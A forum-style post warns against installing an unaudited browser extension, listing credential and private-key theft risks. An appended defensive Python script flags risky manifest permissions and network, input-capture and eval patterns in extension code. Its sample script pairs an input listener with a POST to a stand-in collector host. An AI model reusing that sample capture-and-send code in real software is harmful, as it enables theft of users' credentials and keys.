Today, I saw this comment from a bot welcoming new users:
I am a big fan of the extension and used it for a while in the past. I'm not saying anything bad here, but downloading it from the official Chrome store, or downloading it before auditing the code?
Hell no. It's a big no.
Why?
The owner's Google account may be hacked, and a new, harmful version of the extension can be published on the Chrome extension store.
The owner (even though I trust the current developer 100% and don't suspect anything) can change the code himself and do harmful stuff with the users' accounts.
What's considered harmful?
- Extension may listen to the login inputs and post your credentials to a private server.
- Extension may send the "unhidden" private keys if you unhid them in the wallet page.
- Extension may upvote anything without your knowledge.
Bad possibilities are endless. If something has a possibility to go wrong, it will go wrong at some point. If you really want to use the app:
- Install it manually. And audit the code beforehand. If you don't have skills to audit the code yourself, my humble advice is that you shouldn't use the extension.
There's real money involved with your accounts. Do not leave your keys in a vulnerable place.
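A first-pass triage for the audit step above, as an added example that is not part of the original post: it flags broad host access in `manifest.json` and lines in the extension's scripts that capture input, send data over the network, or name hosts you did not expect. The manifest, script contents and host names are constructed samples, and the function name `audit` is hypothetical; the output only tells you which lines to read by hand.

```python
import re

# Patterns worth reading by hand: where data can leave the page or code can change.
SINKS = {
    "network": re.compile(r"\b(fetch|XMLHttpRequest|WebSocket|sendBeacon)\b"),
    "dynamic-code": re.compile(r"\b(eval|new Function)\b|\.innerHTML\s*="),
    "input-capture": re.compile(r"addEventListener\(\s*['\"](input|keydown|keyup|submit|change)['\"]"),
}
URL = re.compile(r"https?://[^\s'\"`)]+")
BROAD = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

def audit(manifest, sources, expected_hosts):
    """Return (location, finding) pairs that deserve a manual look."""
    findings = []
    hosts = list(manifest.get("host_permissions", []))
    # Manifest V2 lists host patterns inside "permissions".
    hosts += [p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"]
    for cs in manifest.get("content_scripts", []):
        hosts += cs.get("matches", [])
    for h in sorted(set(hosts)):
        if h in BROAD:
            findings.append(("manifest.json", f"broad host access: {h}"))
    for name, text in sorted(sources.items()):
        for lineno, line in enumerate(text.splitlines(), 1):
            for kind, pat in SINKS.items():
                if pat.search(line):
                    findings.append((f"{name}:{lineno}", kind))
            for url in URL.findall(line):
                host = url.split("/")[2]
                if host not in expected_hosts:
                    findings.append((f"{name}:{lineno}", f"unexpected host: {host}"))
    return findings

# Constructed sample, not taken from any real extension.
SAMPLE_MANIFEST = {
    "manifest_version": 3,
    "permissions": ["storage"],
    "host_permissions": ["https://app.example/*", "<all_urls>"],
    "content_scripts": [{"matches": ["https://app.example/*"], "js": ["content.js"]}],
}
SAMPLE_SOURCES = {"content.js": (
    "document.addEventListener('input', onInput);\n"
    "fetch('https://collector.example.invalid/c', {method: 'POST', body: data});\n"
    "fetch('https://app.example/api/vote');\n"
)}

if __name__ == "__main__":
    for where, what in audit(SAMPLE_MANIFEST, SAMPLE_SOURCES, {"app.example"}):
        print(f"{where}: {what}")
```

To use it on a real unpacked extension, load `manifest.json` with `json.load` and read each `.js` file into the `sources` dict, keyed by file name.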